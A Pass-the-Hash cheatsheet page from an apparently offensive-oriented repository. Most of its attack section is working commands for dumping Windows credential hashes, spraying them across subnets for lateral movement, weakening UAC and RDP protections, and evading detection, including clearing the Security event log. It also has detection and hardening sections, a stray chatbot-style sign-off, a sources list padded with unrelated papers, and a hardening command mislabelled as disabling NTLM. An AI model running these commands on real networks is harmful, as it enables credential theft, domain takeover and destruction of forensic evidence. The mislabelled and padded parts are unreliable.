daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-4-pass-the-hash-pth.md (27834B)


      1 ---
      2 title: "Attack #4 β€” Pass-the-Hash (PtH)"
      3 description: "Pass-the-Hash is a credential replay attack that exploits a fundamental design characteristic of the NTLM authentication protocol. When Windows…"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory", "ntlm", "hashing"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "Hashcat"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/πŸ”΄ Attack #4 β€” Pass-the-Hash (PtH).md"
     11 ---
     12 # πŸ”΄ Attack #4 β€” Pass-the-Hash (PtH)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Pass-the-Hash is a **credential replay attack** that exploits a fundamental design characteristic of the NTLM authentication protocol. When Windows authenticates a user, it never actually transmits the plaintext password β€” instead it uses the **NT hash** (MD4 of the Unicode password) directly in the NTLM challenge-response handshake. This means that possessing the hash is **cryptographically equivalent to possessing the password** β€” no cracking required.
     19 
     20 The attacker first compromises any Windows host, dumps NTLM hashes from LSASS memory or the SAM database, then **injects that hash directly into a new authentication context** and authenticates to remote systems as the victim user. Because the remote system has no way to distinguish a hash supplied by the legitimate user from one supplied by an attacker, access is granted immediately. The attack has existed since 1997 and has **no CVE and no patch** β€” it is a consequence of how NTLM was designed.
     21 
     22 > ⚠️ **Windows Server 2022+ Behaviour / Credential Guard Impact:** Modern Windows 10/11 and Server 2022+ with Credential Guard enabled **completely block LSASS hash extraction**. Mimikatz will fail with `ERROR kuhl_m_sekurlsa_getHandle` when trying to access LSASS on Credential Guard-protected systems. However, PtH still works perfectly if you already have the hash from another source (SAM, NTDS.dit, or another non-Credential-Guard host). LSA protection (RunAsPPL) also blocks LSASS access but is less comprehensive than Credential Guard. Remote Credential Guard on Server 2016+ blocks PtH over WinRM (5985), but SMB (445) and RDP (3389) may still work depending on registry configuration.
     23 
     24 **Chains with:** Attack #3 (AS-REP roasting recovers passwords which you then hash to PtH), Attack #5 (PtH + Kerberos = Overpass-the-Hash), Attack #7 (NTLM relay to capture hashes)
     25 
     26 ### The Full Attack Flow
     27 
     28 ```
     29 1. Gain initial foothold on any Windows machine (phishing, exploit, etc.)
     30 2. Escalate to local admin / SYSTEM on that machine
     31 3. Dump NTLM hashes from:
     32    - LSASS process memory (sekurlsa::logonpasswords via Mimikatz)
     33    - SAM database (reg save + secretsdump)
     34    - NTDS.dit (domain-wide dump from DC)
     35 4. Identify high-value hash (Domain Admin, local admin reuse, service account)
     36 5. Inject hash into new authentication session (Mimikatz / impacket / NetExec)
     37 6. Authenticate to remote systems as victim β€” lateral movement achieved
     38 7. Repeat: dump new hashes from each compromised host, escalate further
     39 ```
     40 
     41 ### NTLM Hash Formats β€” Know Your Targets
     42 
     43 | Format | Example | Notes |
     44 |---|---|---|
     45 | **NT hash only** | `aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c` | Most common β€” LM:NT format |
     46 | **LM hash** | `aad3b435b51404eeaad3b435b51404ee` | Effectively blank β€” LM disabled by default since Vista |
     47 | **NT hash only** | `8846f7eaee8fb117ad06bdd830b7586c` | The part that matters β€” right side of the colon |
     48 | **NTLM relay capture** | Full Net-NTLMv1/v2 | **Cannot** be used for PtH directly β€” must be relayed or cracked |
     49 
     50 > ⚠️ **Critical distinction:** You **can** Pass-the-Hash with the **NT hash** (from LSASS/SAM/NTDS). You **cannot** Pass-the-Hash with a **Net-NTLMv2** hash captured from Responder β€” those must be cracked or relayed (see Attack #7).
     51 
     52 ***
     53 
     54 ## βš™οΈ Prerequisites
     55 
     56 | Requirement | Detail |
     57 |---|---|
     58 | **Local admin / SYSTEM on a host** | Required to dump LSASS or access SAM β€” standard user cannot read these |
     59 | **NTLM authentication enabled** | Target must accept NTLM β€” if Kerberos-only is enforced, use Overpass-the-Hash instead |
     60 | **Network access to target** | Ports 445 (SMB), 135 (RPC), 5985 (WinRM) depending on tool |
     61 | **Target has same credentials** | Hash must be valid on the remote system (domain account or local admin reuse) |
     62 | **UAC remote restrictions** | Local admin PtH blocked by `LocalAccountTokenFilterPolicy` unless the built-in RID-500 admin account is used |
     63 
     64 ***
     65 
     66 ## πŸ› οΈ Tools
     67 
     68 | Tool | Platform | Protocol | Notes |
     69 |---|---|---|---|
     70 | **Mimikatz** | Windows | NTLM | Gold standard; `sekurlsa::pth` spawns a new process with injected hash |
     71 | **Impacket suite** | Linux | SMB/RPC | `psexec.py`, `smbexec.py`, `wmiexec.py` all support `-hashes` flag |
     72 | **NetExec / CrackMapExec** | Linux | SMB/WinRM/LDAP | Best for mass lateral movement across subnets |
     73 | **Evil-WinRM** | Linux | WinRM (5985) | Clean interactive shell via PtH over WinRM |
     74 | **xfreerdp** | Linux | RDP (3389) | PtH over RDP with Restricted Admin Mode enabled |
     75 | **Metasploit** | Both | SMB | `exploit/windows/smb/psexec` + `pass_the_hash` module |
     76 | **pth-winexe / pth-smbclient** | Linux | SMB | Legacy Kali tools; still effective for quick access |
     77 | **lsassy.py** | Linux | Network-based | Remotely extracts hashes from LSASS without local admin shell |
     78 
     79 ***
     80 
     81 ## πŸ’» Full Commands
     82 
     83 ### πŸ”΅ Step 0 β€” Dump NTLM Hashes (Hash Acquisition Phase)
     84 
     85 ```powershell
     86 # ── Mimikatz on compromised Windows host ──────────────────────────────────────
     87 
     88 # Dump all credentials from LSASS memory (requires local admin)
     89 privilege::debug
     90 sekurlsa::logonpasswords
     91 
     92 # Dump only NTLM hashes (faster, less noise)
     93 sekurlsa::msv
     94 
     95 # Dump SAM database (local account hashes β€” works offline too)
     96 token::elevate
     97 lsadump::sam
     98 
     99 # Dump domain hashes via DCSync (if you have replication rights)
    100 lsadump::dcsync /domain:corp.local /user:Administrator
    101 lsadump::dcsync /domain:corp.local /all /csv
    102 ```
    103 
    104 ```bash
    105 # ── Linux β€” remote SAM/NTDS dump via Impacket ─────────────────────────────────
    106 
    107 # Dump SAM from remote machine (requires local admin creds or hash)
    108 secretsdump.py corp.local/Administrator:'Password1'@10.10.10.10
    109 
    110 # Dump using existing NT hash (PtH to get more hashes)
    111 secretsdump.py corp.local/Administrator@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
    112 
    113 # Dump all domain hashes from DC (NTDS.dit via VSS)
    114 secretsdump.py corp.local/Administrator:'Password1'@10.10.10.10 -just-dc-ntlm
    115 
    116 # Output to file
    117 secretsdump.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c -outputfile domain_hashes
    118 ```
    119 
    120 ***
    121 
    122 ### πŸ”΄ Mimikatz β€” Pass-the-Hash (Windows, Spawn New Process)
    123 
    124 ```powershell
    125 # Classic PtH β€” spawns cmd.exe as target user with injected hash
    126 # (Opens a new window authenticated as that user)
    127 sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c
    128 
    129 # PtH with specific program (e.g., PowerShell)
    130 sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:powershell.exe
    131 
    132 # PtH for local admin (use local machine name instead of domain)
    133 sekurlsa::pth /user:Administrator /domain:WORKSTATION01 /ntlm:8846f7eaee8fb117ad06bdd830b7586c
    134 
    135 # Then from the spawned shell β€” verify access and move laterally
    136 dir \\10.10.10.20\C$
    137 Enter-PSSession -ComputerName 10.10.10.20
    138 ```
    139 
    140 ***
    141 
    142 ### πŸ”΄ Impacket β€” Linux (Most Versatile Toolkit)
    143 
    144 ```bash
    145 # ── psexec.py β€” SMB exec, spawns SYSTEM shell ─────────────────────────────────
    146 psexec.py corp.local/Administrator@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
    147 
    148 # NT hash only (left side can be blank or aad3b... placeholder)
    149 psexec.py Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c
    150 
    151 # ── smbexec.py β€” no binary drop on disk (stealthier than psexec) ──────────────
    152 smbexec.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c
    153 
    154 # ── wmiexec.py β€” WMI-based execution (no service creation) ───────────────────
    155 wmiexec.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c
    156 
    157 # ── atexec.py β€” Task Scheduler execution (avoids SMB pipe artifacts) ─────────
    158 atexec.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c whoami
    159 
    160 # ── smbclient.py β€” browse file shares as target user ─────────────────────────
    161 smbclient.py corp.local/Administrator@10.10.10.10 -hashes :8846f7eaee8fb117ad06bdd830b7586c
    162 ```
    163 
    164 ***
    165 
    166 ### πŸ”΄ NetExec / CrackMapExec β€” Linux (Mass Lateral Movement)
    167 
    168 ```bash
    169 # Single target PtH via SMB
    170 nxc smb 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
    171 
    172 # Full hash format (LM:NT)
    173 nxc smb 10.10.10.10 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
    174 
    175 # Subnet sweep β€” find all machines where hash is valid local admin
    176 nxc smb 10.10.10.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c --local-auth
    177 
    178 # Domain-wide sweep
    179 nxc smb 10.10.10.0/24 -u corp_admin -H 8846f7eaee8fb117ad06bdd830b7586c
    180 
    181 # Execute a command on all matching hosts
    182 nxc smb 10.10.10.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c -x whoami
    183 
    184 # Dump SAM from all compromised hosts in one sweep
    185 nxc smb 10.10.10.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c --sam
    186 
    187 # Dump LSA secrets (service account creds, DPAPI keys)
    188 nxc smb 10.10.10.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c --lsa
    189 
    190 # WinRM PtH (port 5985) β€” interactive shell
    191 nxc winrm 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
    192 ```
    193 
    194 ***
    195 
    196 ### πŸ”΄ Evil-WinRM β€” Linux (Clean Interactive Shell)
    197 
    198 ```bash
    199 # PtH over WinRM β€” gives a clean PowerShell-like shell
    200 evil-winrm -i 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
    201 
    202 # With domain specified
    203 evil-winrm -i 10.10.10.10 -u corp.local\\Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
    204 
    205 # Load PowerShell scripts on connect
    206 evil-winrm -i 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c \
    207   -s /opt/PowerSploit/Privesc/
    208 ```
    209 
    210 ***
    211 
    212 ### πŸ”΄ xfreerdp β€” RDP via Pass-the-Hash (Restricted Admin Mode)
    213 
    214 ```bash
    215 # PtH over RDP β€” requires Restricted Admin Mode enabled on target
    216 # (enabled by default on Server 2012R2+, or manually via registry key)
    217 xfreerdp /v:10.10.10.10 /u:Administrator /pth:8846f7eaee8fb117ad06bdd830b7586c /d:corp.local +compression /dynamic-resolution
    218 
    219 # Enable Restricted Admin Mode on target first (if you have access via another method)
    220 # (Run on target machine)
    221 reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
    222 ```
    223 
    224 ***
    225 
    226 ### πŸ”΄ lsassy.py β€” Remote LSASS Credential Extraction (No Shell Required)
    227 
    228 ```bash
    229 # Extract hashes directly from remote LSASS without interactive shell
    230 lsassy 10.10.10.10 -u low_user -p 'Password1'
    231 
    232 # Using existing hash (PtH into LSASS extraction)
    233 lsassy 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
    234 
    235 # Dump to file for batch processing
    236 lsassy 10.10.10.10 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c -o hashes_from_remote.txt
    237 
    238 # Note: lsassy bypasses LSASS access restrictions in some cases by using DCSync-like RPC calls
    239 ```
    240 
    241 ***
    242 
    243 ### πŸ”΄ UAC & LocalAccountTokenFilterPolicy β€” Handling PtH Blocks
    244 
    245 ```bash
    246 # By default, non-RID500 local admins are blocked from PtH via SMB
    247 # (UAC remote restriction β€” Token Filtering Policy)
    248 
    249 # Fix 1 β€” Enable LocalAccountTokenFilterPolicy on target (if you have a shell)
    250 reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System \
    251   /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    252 
    253 # Fix 2 β€” Use the built-in RID-500 Administrator account (not subject to UAC filtering)
    254 # The built-in Administrator (SID ending in -500) bypasses this restriction automatically
    255 
    256 # Fix 3 β€” Use domain accounts instead of local accounts
    257 # Domain admin accounts are never subject to UAC remote filtering
    258 ```
    259 
    260 ***
    261 
    262 ### πŸ”΄ Credential Guard Bypass Attempts (Note: Most Don't Work)
    263 
    264 ```bash
    265 # ⚠️ IMPORTANT: These attempts are mostly ineffective against modern Credential Guard
    266 # They are listed for awareness and educational purposes only
    267 
    268 # Attempt 1 β€” Use lsassy with Direct Approach (limited success)
    269 lsassy -t wdigest 10.10.10.10 -u low_user -p 'Password1'
    270 # Result: May fail with "Failed to get handle on LSASS" if Credential Guard is active
    271 
    272 # Attempt 2 β€” Dump via ntlmrelayx (relay attack, not direct extraction)
    273 # This works against NTLM relay targets, NOT against Credential Guard itself
    274 ntlmrelayx.py -t smb://10.10.10.10
    275 
    276 # Attempt 3 β€” Use PtH with Kerberos (Overpass-the-Hash) instead
    277 # If target allows Kerberos, convert NT hash β†’ TGT and bypass NTLM entirely (see Attack #5)
    278 Rubeus.exe asktgt /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c /outfile:ticket.kirbi
    279 
    280 # NOTE: No direct bypass for Credential Guard exists. Mitigations:
    281 # - Use already-compromised pre-Credential-Guard hosts as pivot points
    282 # - Perform DCSync if you have replication rights (domain-level, not LSASS)
    283 # - Target systems that don't have Credential Guard enabled (older workstations)
    284 ```
    285 
    286 ***
    287 
    288 ## 🧩 Troubleshooting
    289 
    290 | Error | Cause | Fix |
    291 |---|---|---|
    292 | **`STATUS_LOGON_FAILURE` / `STATUS_ACCESS_DENIED`** | Hash is invalid for this user or wrong domain. | Verify the hash is correct. Check spelling of username and domain. Try hash on a different target where you know it's valid (test with SAM first). |
    293 | **`ERROR kuhl_m_sekurlsa_getHandle: 0x00000005`** | Credential Guard enabled on target; cannot access LSASS. | Credential Guard is active and blocks LSASS extraction. Use hashes from another source (SAM, NTDS, or a non-Credential-Guard host) to PtH into this system instead. Or pivot to Overpass-the-Hash (Kerberos). |
    294 | **`LSA Protection (RunAsPPL) prevented LSASS access`** | Process Protection Light is enabled, blocking Mimikatz. | Switch to secretsdump via SMB instead: `secretsdump.py corp.local/admin@target -hashes :hash`. Or use lsassy for remote extraction. |
    295 | **`Access denied / UAC remote restriction`** | LocalAccountTokenFilterPolicy blocks local admin PtH. | Use the built-in RID-500 Administrator account instead of a custom local admin. Or set `LocalAccountTokenFilterPolicy=1` on target (requires shell first). Domain accounts bypass this. |
    296 | **`Restricted Admin Mode not enabled on RDP target`** | xfreerdp PtH requires Restricted Admin Mode. | Enable on target: `reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0x0`. Or use SMB/WinRM instead of RDP. |
    297 | **`No such file or directory: secretsdump.py`** | Impacket not installed or path incorrect. | Install: `pip install impacket --upgrade`. Check Python PATH: `which secretsdump.py`. |
    298 | **`Socket timeout / Connection refused on port 445`** | SMB port filtered or host offline. | Check connectivity: `nc -zv 10.10.10.10 445`. Verify host is online. Check firewall rules. Try different access method (WinRM on 5985, RDP on 3389). |
    299 | **`NTLM relay hash captured from Responder (Net-NTLMv2)`** | You have a relay hash, not an NT hash β€” PtH won't work directly. | Crack the hash first: `hashcat -m 5600 relay_hash.txt rockyou.txt`. Or relay it (NTLM relay, Attack #7). PtH requires NT hashes only. |
    300 | **`WinRM (5985) authentication fails but SMB (445) works`** | Remote Credential Guard may be blocking WinRM. | Remote Credential Guard blocks PtH over WinRM (5985) on Server 2016+. Use SMB (445) instead with `psexec.py`, `smbexec.py`, or `nxc smb`. |
    301 
    302 ***
    303 
    304 ## 🎯 OPSEC Tips
    305 
    306 ### OpSec Ranking (Stealthiest to Loudest)
    307 
    308 1. **`wmiexec.py` over single host** (stealthiest) β€” WMI, no service creation, minimal artifacts
    309 2. **`atexec.py` for single commands** β€” Task Scheduler, fast cleanup, low footprint
    310 3. **`smbexec.py` for shell** β€” SMB service, no binary drop, moderate artifacts
    311 4. **Mimikatz local PtH (interactive)** β€” Process injection, visible process list
    312 5. **`psexec.py` spray across subnet** (loudest) β€” Service binary drop, obvious SMB activity, mass 4688 events
    313 
    314 ### Modern Defence Impact
    315 
    316 - **Credential Guard** β€” blocks LSASS hash extraction entirely. Dumping becomes impossible from that host, but PtH still works using pre-dumped hashes.
    317 - **SMB Signing + Enforcement** β€” if enabled, some attacks are blocked. Kerberos PtH (Overpass-the-Hash) becomes necessary.
    318 - **Windows Defender + Sysmon** β€” Mimikatz binary execution is often caught. In-memory LOLBins or living-off-the-land techniques avoid this.
    319 - **Network segmentation** β€” if properly configured, lateral movement is blocked even with valid hashes.
    320 
    321 ### Opsec Best Practices
    322 
    323 - **`wmiexec.py` over `psexec.py`** β€” psexec creates a service and drops a binary to disk; wmiexec uses WMI and leaves significantly fewer artefacts
    324 - **`smbexec.py`** β€” runs commands via SMB service creation but never writes a binary; good middle ground
    325 - **Prefer `atexec.py`** for single command execution β€” uses Task Scheduler, minimal footprint
    326 - **Don't spray hashes across the entire subnet** unless necessary β€” multiple 4624 Type 3 events from one source IP is a clear detection signal
    327 - **Use domain admin hashes carefully** β€” authentication events from a DA account hitting multiple systems simultaneously triggers most modern SIEMs
    328 - **Target local admin reuse first** β€” a recycled local admin hash across 50 workstations is gold for lateral movement with less scrutiny than DA activity
    329 - **Clear event logs after PtH** if persistence isn't the goal: `wevtutil cl Security` (noisy, but useful)
    330 
    331 ***
    332 
    333 ## πŸ›‘οΈ Detection β€” Event IDs
    334 
    335 | Event ID | Source | What to Look For |
    336 |---|---|---|
    337 | **4624** | Security Log | Successful logon β€” **Logon Type 3** (network) with **NtLmSsp** as authentication package |
    338 | **4624** | Security Log | Type 9 logon (NewCredentials) β€” Mimikatz `sekurlsa::pth` spawns this |
    339 | **4648** | Security Log | Logon with explicit credentials β€” attacker injecting hash to remote system |
    340 | **4672** | Security Log | Special privileges assigned to new logon (DA/local admin access) |
    341 | **4776** | Security Log | DC attempted to validate NTLM credentials β€” `Status 0x0` = success |
    342 | **7045** | System Log | New service installed β€” `psexec.py` creates a service; look for random-name binaries |
    343 | **Sysmon EID 1** | Sysmon | Process creation β€” `lsass.exe` being accessed by non-system processes |
    344 | **Sysmon EID 10** | Sysmon | `ProcessAccess` β€” Mimikatz opens LSASS with `PROCESS_VM_READ` access |
    345 
    346 **Primary detection signature:** Event 4624 with `LogonType: 3`, `AuthenticationPackage: NTLM`, and `WorkstationName` / `IpAddress` pointing to a machine where that user has no business authenticating from. Sysmon Event 10 for LSASS access is the earliest indicator β€” catching the dump phase before the pass even occurs.
    347 
    348 ### Additional Sysmon Event IDs
    349 
    350 | Event ID | Detection |
    351 |---|---|
    352 | **Sysmon 8** | CreateRemoteThread into process (hash injection by Mimikatz) |
    353 | **Sysmon 11** | File creation on target system (binary drop from psexec or service binary) |
    354 | **Sysmon 17** | PipeCreated (SMB pipes for service execution) |
    355 | **Sysmon 18** | PipeConnected (attacker connecting to named pipes) |
    356 
    357 ### Sigma Rule References
    358 
    359 - **Sigma rule:** `credential_access_ntlm_relay_ntlmssp` β€” detects NTLM authentication from unusual sources
    360 - **Sigma rule:** `lateral_movement_remote_services` β€” monitors for WMI/SMB lateral movement patterns
    361 - **Sigma rule:** `privilege_escalation_local_admin_check` β€” flags sudden admin access from non-admin accounts
    362 - Link: https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pass_the_hash.yml
    363 
    364 ### EDR Detections
    365 
    366 - **Microsoft Defender for Identity:** Pass-the-Hash detection (abnormal logon type + NTLM from unexpected source) β€” flags hash-based auth
    367 - **CrowdStrike Falcon:** Detects Mimikatz via behavioral heuristics (LSASS access + credential dumping pattern)
    368 - **Elastic Security:** Hunt rule `credential_access_pass_the_hash_ntlm` β€” correlates LSASS access + NTLM logon
    369 - **Sysmon + SIEM correlations:** Sysmon 10 (LSASS access) followed by 4624 Type 3 logon = PtH in progress
    370 
    371 ### Hardening Commands
    372 
    373 ```powershell
    374 # Disable NTLM across domain (force Kerberos-only β€” breaks backward compat)
    375 # (Domain-wide GPO setting)
    376 Set-GPRegistryValue -Name "Default Domain Policy" \
    377   -Key "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" \
    378   -ValueName "RestrictAnonymous" -Type DWord -Value 2
    379 
    380 # Enable Credential Guard (prevents LSASS hash extraction)
    381 # Server 2016+ / Win10+ with TPM 2.0
    382 Invoke-CimMethod -ClassName Win32_DeviceGuard -MethodName Enable -Arguments @{HypervisorManagedCodeIntegrityEnforcementPolicy = 1}
    383 
    384 # Enable LSA Protection (RunAsPPL β€” blocks LSASS direct access)
    385 # Windows 8.1+ / Server 2012 R2+
    386 reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1 /f
    387 
    388 # Enforce SMB Signing (blocks some NTLM relay attacks)
    389 # (GPO path: Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies)
    390 Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    391 
    392 # Monitor for LSASS access attempts
    393 # (Enable advanced audit policy)
    394 auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
    395 
    396 # Disable WDIGEST (removes cleartext password from LSASS)
    397 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
    398 ```
    399 
    400 ***
    401 
    402 ## πŸ—ΊοΈ MITRE ATT&CK
    403 
    404 | Tactic | Technique ID | Sub-technique | Observed in | Platforms | Data Sources |
    405 |---|---|---|---|---|---|
    406 | Lateral Movement | T1550 | **002** (PtH) | APT1, APT28, Wizard Spider, FIN7, Carbanak | Windows | Authentication logs (4624, 4776), Sysmon EID 10 (Process Access), Network traffic (SMB/RPC) |
    407 
    408 **T1550.002 β€” Use Alternate Authentication Material: Pass the Hash** β€” Leverages NTLM hash to authenticate without plaintext password. Works on all Windows versions supporting NTLM (which is all of them, for backward compatibility).
    409 
    410 ***
    411 
    412 ## πŸ”— Attack Chain Context
    413 
    414 ```
    415 [Pass-the-Hash] ──→ Authenticated Session on Remote Host as Victim User
    416          β”‚
    417          β”œβ”€β”€β†’ πŸ” Dump LSASS on new host β†’ more hashes β†’ repeat loop
    418          β”œβ”€β”€β†’ 🎫 Overpass-the-Hash (convert NT hash β†’ Kerberos TGT)
    419          β”œβ”€β”€β†’ 🩸 DCSync (if DA hash obtained β†’ dump all domain hashes)
    420          β”œβ”€β”€β†’ 🎫 Golden Ticket (KRBTGT hash from DCSync β†’ permanent persistence)
    421          β”œβ”€β”€β†’ πŸ“ Access file shares, databases, email as privileged user
    422          └──→ 🎯 Find DA cached logon on compromised workstation β†’ instant DA
    423 ```
    424 
    425 **The lateral movement loop:** Compromise host β†’ dump hashes β†’ PtH to next host β†’ find higher-privilege hash β†’ repeat until Domain Admin is reached. In a flat network without segmentation, this loop can take **under 10 minutes** from first workstation compromise to Domain Admin. The technique works on any Windows version and requires no exploits β€” just valid hashes and network access.
    426 
    427 ***
    428 
    429 > βœ… **Attack #4 β€” Pass-the-Hash complete.** Tell me to move on when you're ready for **Attack #5 β€” Pass-the-Ticket (PtT)**.
    430 
    431 Sources
    432  What is a Pass-the-Hash Attack? | CrowdStrike https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/pass-the-hash-attack/
    433  What is a Pass-the-Hash Attack (PtH)? | BeyondTrust https://www.beyondtrust.com/resources/glossary/pass-the-hash-pth-attack
    434  What is Pass-the-Hash? Attacks Types and Security Best Practices https://www.vaadata.com/blog/what-is-pass-the-hash-attacks-types-and-security-best-practices/
    435  What are Pass-the-Hash (PtH) & Pass-the-Ticket (PtT)? https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-are-pass-the-hash-pth-pass-the-ticket-ptt/
    436  Active Directory Attacks: Pass-the-Hash, Pass-the-Ticket & Qualys ETM ... https://blog.qualys.com/product-tech/2026/02/11/qualys-etm-detect-pass-the-hash-pass-the-ticket-attacks
    437  Understanding Pass-the-Hash: How Attackers Exploit https://www.hedgehogsecurity.co.uk/blog/understanding-pass-the-hash-attack-how-hackers-exploit-password-vulnerabilities
    438  Detecting Pass-the-Hash Attack in a Microsoft Active Directory Environment using an Open-Source Approach https://ieeexplore.ieee.org/document/10795633/
    439  An Open-Source Approach to Detect Pass-the-Hash Attack in Active Directory Using Wazuh and Sysmon https://link.springer.com/10.1134/S0361768825700483
    440  Pass the Hash Attack Defense | AD Security 101 https://www.semperis.com/blog/how-to-defend-against-pass-the-hash-attack/
    441  Pass the hash - Wikipedia https://en.wikipedia.org/wiki/Pass_the_hash
    442  What Is a Pass the Hash Attack? | Proofpoint USwww.proofpoint.com β€Ί threat-reference β€Ί pass-the-hash https://www.proofpoint.com/us/threat-reference/pass-the-hash
    443  An Expert Guide to Mitigating Pass-the-Hash Attacks in Active Directory https://www.nccgroup.com/research/defending-your-directory-an-expert-guide-to-mitigating-pass-the-hash-attacks-in-active-directory/
    444  What is a Pass-the-Hash Attack (PtH)? PtH Explained https://www.xcitium.com/knowledge-base/pth/
    445  Threat overview https://www.semperis.com/blog/pass-the-hash-attack-explained/
    446  Identifying and Preventing... https://www.strongdm.com/what-is/pass-the-hash-attack-pth
    447  Pass the Hash: Mechanics and Mitigation https://nordpass.com/blog/pass-the-hash-attack/
    448  Pass the Hash and Credential Theft https://download.microsoft.com/download/C/5/7/C57FB17E-620C-46AD-BC3E-4A8064273669/Aaron_Margosis_Pass_the_hash.pdf
    449  Pass-the-Hash in Windows 10 GIAC ( GCIH ) Gold Certification https://www.semanticscholar.org/paper/ca3bdcf7802e8d834f52845a0eb3b953111971f5
    450  Pass-the-Hash in Windows 10 https://www.semanticscholar.org/paper/59c5ac8c084e13433f4d56703dee90eb25736194
    451  Pass-the-Hash: One of the Most Prevalent Yet Underrated Attacks for Credentials Theft and Reuse https://dl.acm.org/doi/10.1145/3134302.3134338
    452  Defeating Pass-the-Hash Separation of Powers https://www.semanticscholar.org/paper/a6ffa297b6c915f3056c207c55f9a99f299350e2
    453  Improved Preimage Attack on 3-Pass HAVAL https://www.semanticscholar.org/paper/e33983337beb98d51dbab233206d8d1a9243bf0a
    454  Improved preimage attack on 3-pass HAVAL http://link.springer.com/10.1007/s12204-011-1215-3
    455  Enhanced Multi-Chaotic Fredkin-Logic-Based Image Encryption for Satellite Imagery with Adaptive Hash-Driven Key Generation https://bajest.bauc14.edu.iq/index.php/bajest/article/view/179
    456  Some Cryptanalytic Results on Zipper Hash and Concatenated Hash https://www.semanticscholar.org/paper/9637504875342b0467aada6de710346971270459
    457  PTHash: Revisiting FCH Minimal Perfect Hashing http://arxiv.org/pdf/2104.10402.pdf
    458  Recovering cryptographic keys from partial information, by example https://cic.iacr.org/p/1/1/28/pdf
    459  CASH: A Cost Asymmetric Secure Hash Algorithm for Optimal Password Protection http://arxiv.org/pdf/1509.00239.pdf
    460  The Spy in the Sandbox -- Practical Cache Attacks in Javascript http://arxiv.org/pdf/1502.07373v2.pdf
    461  Exploiting Leakage in Password Managers via Injection Attacks http://arxiv.org/pdf/2408.07054.pdf
    462  Cost-Asymmetric Memory Hard Password Hashing http://arxiv.org/pdf/2206.12970.pdf
    463  Passive SSH Key Compromise via Lattices https://dl.acm.org/doi/pdf/10.1145/3576915.3616629
    464  Covert Channels in One-Time Passwords Based on Hash Chains https://zenodo.org/record/5999651/files/EICC_2020_Poster.pdf